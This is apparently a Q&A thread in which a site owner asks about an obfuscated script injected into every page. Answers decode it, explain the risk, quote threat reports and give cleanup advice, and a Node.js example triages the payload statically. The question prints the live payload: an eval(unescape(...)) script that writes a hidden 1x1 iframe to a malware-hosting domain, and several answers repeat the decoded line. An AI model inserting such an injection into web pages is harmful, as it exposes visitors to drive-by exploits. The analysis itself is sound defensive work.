Question

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

My website www.safwanmanpower.com is attacked by a malware script on each page. I don't know what this script is all about. Can anybody tell me how this script makes my website malware-affected??

Hoping for a quick and positive response.

edited

How can someone attack my website without permission to upload??


Solution

The unescaped code is something like this:

document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

Evaluating it will add a 1px by 1px iframe to your site, which points to the above address.
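The decoding described in this answer, and the "removing the whitespace" step noted in a later answer, as an added Node.js example (not code from the question or from any of the answers): the percent-encoded literal is pulled out of `eval(unescape('...'))` with a regex and decoded statically, so nothing from the page is ever executed. The sample page below is constructed from the script in the question; the function names `decodeUnescape`, `extractPayloads`, `findIframes` and `triage` are my own.

```javascript
// Added example: static triage of an injected eval(unescape(...)) script.
// The decode mimics what unescape() does (%XX and %uXXXX), without evaluating anything.

// Constructed sample: the injected script from the question, including the line
// wraps that break some "%XX" sequences when the literal is unescaped as-is.
const INJECTED_PAGE = `<html><body><p>hello</p>
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script></body></html>`;

// Constructed clean page for the negative case.
const CLEAN_PAGE = `<html><body><script>console.log("ok");</script></body></html>`;

// Decode %XX / %uXXXX the way unescape() does; anything else stays literal,
// which is why a "%" followed by a line break survives undecoded.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u ?? b, 16)));
}

const EVAL_UNESCAPE_RE = /eval\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/g;

// Find every eval(unescape('...')) literal in a page and decode it both ways:
// as-is (partial decode when wrapped) and with all whitespace stripped first
// (an encoded payload has no literal whitespace, so stripping is safe).
function extractPayloads(html) {
  const out = [];
  for (const m of html.matchAll(EVAL_UNESCAPE_RE)) {
    const raw = m[2];
    out.push({
      raw,
      decodedAsIs: decodeUnescape(raw),
      decoded: decodeUnescape(raw.replace(/\s+/g, '')),
    });
  }
  return out;
}

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Pull iframe tags out of decoded JavaScript and flag the ones sized to be invisible.
function findIframes(js) {
  const found = [];
  for (const m of js.matchAll(IFRAME_RE)) {
    const attrs = {};
    for (const a of m[1].matchAll(ATTR_RE)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const width = Number(attrs.width);
    const height = Number(attrs.height);
    const hidden = (Number.isFinite(width) && width <= 1) ||
                   (Number.isFinite(height) && height <= 1);
    let host = null;
    try { host = new URL(attrs.src).hostname; } catch (_) { /* no usable src */ }
    found.push({ src: attrs.src ?? null, host, width, height, hidden });
  }
  return found;
}

// One report per page: how many obfuscated payloads, and which iframes they inject.
function triage(html) {
  const payloads = extractPayloads(html);
  const iframes = payloads.flatMap((p) => findIframes(p.decoded));
  return { payloads: payloads.length, iframes };
}

console.log(JSON.stringify(triage(INJECTED_PAGE), null, 2));
console.log(JSON.stringify(triage(CLEAN_PAGE)));
```

Run over a copy of each page pulled from the server (not in a browser), the `hidden` flag together with an external `host` is the indicator to act on; the `decodedAsIs` field shows the same partial decode ("wri%...74e") that one answer got before removing the whitespace.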

OTHER TIPS

Your site has been compromised by a known entity. Your page is now serving exploits to your visitors and is putting them at risk.

Take your site down now and refer to: http://safeweb.norton.com/report/show?name=sedpoo.com

Threat Report
Total threats found: 4

Drive-By Downloads (what's this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)
Threat Name: HTTP Malicious Toolkit Variant Activity 15
Location: http://sedpoo.com/?687328

Threat Name: HTTP Malicious Toolkit Variant Activity 15
Location: http://sedpoo.com/?-560137484

Threat Name: HTTP Malicious Toolkit Variant Activity 15
Location: http://sedpoo.com/?2443640

Viruses (what's this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)
Threat Name: Trojan.Gen
Location: http://sedpoo.com/des.jar


And: http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-18, and the last time suspicious content was found on this site was on 2011-01-18. Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.


I would not visit the sedpoo attack site until you have further researched the threat and are ready to deal with the potential infections that may ensue. Spinning up a virtual machine to visit the site is a quick way to further investigate without putting your workstation and data in harm's way.

You should use smscanner (Simple Server Malware Scanner), which will scan for infected files, scripts, obfuscated JavaScript code, shells, etc. So far it works on Linux web servers.

More @ https://sourceforge.net/projects/smscanner/

On Chrome, that unescapes to "document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')", which Chrome tells me is a site that hosts malware.

When removing the whitespace it decodes to:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

If you want to see what that code does, paste the escaped code on this URL (I've done it, and it appears to be trying to redirect your site to another link): http://www.linkedresources.com/tools/unescaper_v0.2b1.html

Are you using some kind of Content Management System (CMS) on your website? If so, the best thing you can do is to go to that CMS's website and download the latest version.

The unescaped code is:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

This creates an iframe to http://sedpoo.com/?338375, which I assume will generate pop-ups for advertising, etc.

I unescaped the code using the tool here to get this:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

This embeds a 1px x 1px (effectively invisible) iframe into your page; from there it's most likely attacking your visitors with exploits or simply trying to spawn advert windows.

I will answer the direct question: injecting a script into every page means the hacker got control over the web server, maybe over the whole host's web farm.

How? Maybe he stole the admin password. Maybe he worked at the host and used a back door he planted. You can't really know, and if you're hosted you can't really protect yourself, as it's the host's responsibility.

If you're hosted, find another, more reliable host. Otherwise do as Cfreak commented and change all the passwords on the server, install a new and powerful firewall, etc.

Edit: in case the server is yours (i.e. you don't use a 3rd-party host), check the Security event log and see who logged in during the time of the infection. Obviously, run a full virus/malware scan.

Here is the deobfuscated JavaScript code:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

Licensed under: CC-BY-SA with attribution